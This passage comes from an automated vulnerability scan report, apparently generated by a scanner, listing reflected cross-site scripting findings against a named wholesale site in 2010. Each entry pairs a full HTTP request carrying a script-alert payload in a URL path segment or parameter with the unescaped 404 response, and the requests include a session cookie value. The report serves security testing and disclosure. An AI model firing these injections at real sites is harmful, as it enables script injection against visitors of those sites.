Request

GET /goods-wholesale/themes/kosmos/images/ratinge4641<script>alert(1)</script>09b0ba96bca/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/ratinge4641<script>alert(1)</script>09b0ba96bca/ was not found on this server.</p>
...[SNIP]...

2.3863. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9b86c<script>alert(1)</script>b7db9a85109 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/rating/?9b86c<script>alert(1)</script>b7db9a85109=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/?9b86c<script>alert(1)</script>b7db9a85109=1 was not found on this server.</p>
...[SNIP]...

2.3864. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/4.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 64500<script>alert(1)</script>2da9e6eecc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale64500<script>alert(1)</script>2da9e6eecc3/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale64500<script>alert(1)</script>2da9e6eecc3/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3865. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/4.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4dc55<script>alert(1)</script>1f9ab1971ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes4dc55<script>alert(1)</script>1f9ab1971ea/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes4dc55<script>alert(1)</script>1f9ab1971ea/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3866. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/4.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 569f0<script>alert(1)</script>29e07797f93 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos569f0<script>alert(1)</script>29e07797f93/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos569f0<script>alert(1)</script>29e07797f93/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3867. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/4.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 62ecb<script>alert(1)</script>1057e36ac92 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images62ecb<script>alert(1)</script>1057e36ac92/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images62ecb<script>alert(1)</script>1057e36ac92/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3868. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/4.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload afcf2<script>alert(1)</script>adaf3c369cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/ratingafcf2<script>alert(1)</script>adaf3c369cb/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/ratingafcf2<script>alert(1)</script>adaf3c369cb/4.gif was not found on this server.</p>
...[SNIP]...

2.3869. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/4.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 493a9<script>alert(1)</script>a84e716df89 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/rating/4.gif493a9<script>alert(1)</script>a84e716df89 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/4.gif493a9<script>alert(1)</script>a84e716df89 was not found on this server.</p>
...[SNIP]...

2.3870. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 987e0<script>alert(1)</script>4820348d16b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/rating/4.gif?987e0<script>alert(1)</script>4820348d16b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/4.gif?987e0<script>alert(1)</script>4820348d16b=1 was not found on this server.</p>
...[SNIP]...

2.3871. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3c031<script>alert(1)</script>b76b65d01b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale3c031<script>alert(1)</script>b76b65d01b0/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale3c031<script>alert(1)</script>b76b65d01b0/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3872. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3f261<script>alert(1)</script>0722b667ffa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes3f261<script>alert(1)</script>0722b667ffa/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes3f261<script>alert(1)</script>0722b667ffa/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3873. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6f9b9<script>alert(1)</script>d2fa5f757be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos6f9b9<script>alert(1)</script>d2fa5f757be/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos6f9b9<script>alert(1)</script>d2fa5f757be/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3874. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 185f6<script>alert(1)</script>a808ff128f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images185f6<script>alert(1)</script>a808ff128f5/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images185f6<script>alert(1)</script>a808ff128f5/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3875. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1b800<script>alert(1)</script>a0ab7d588eb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/rating1b800<script>alert(1)</script>a0ab7d588eb/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating1b800<script>alert(1)</script>a0ab7d588eb/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3876. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6cb2c<script>alert(1)</script>92c8889fa91 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/rating/search.php6cb2c<script>alert(1)</script>92c8889fa91?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/search.php6cb2c<script>alert(1)</script>92c8889fa91?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3877. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 85cbe<a>110f8b67e05 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search85cbe<a>110f8b67e05&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search85cbe<a>110f8b67e05&opt=2 was not found on this server.</p>
...[SNIP]...

2.3878. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload fcceb<a>f22896aede4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...fcceb<a>f22896aede4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...fcceb<a>f22896aede4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3879. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 24841<script>alert(1)</script>4f6b329ce20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&24841<script>alert(1)</script>4f6b329ce20=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&24841<script>alert(1)</script>4f6b329ce20=1 was not found on this server.</p>
...[SNIP]...

2.3880. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 60a84<a>1855c2ad138 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

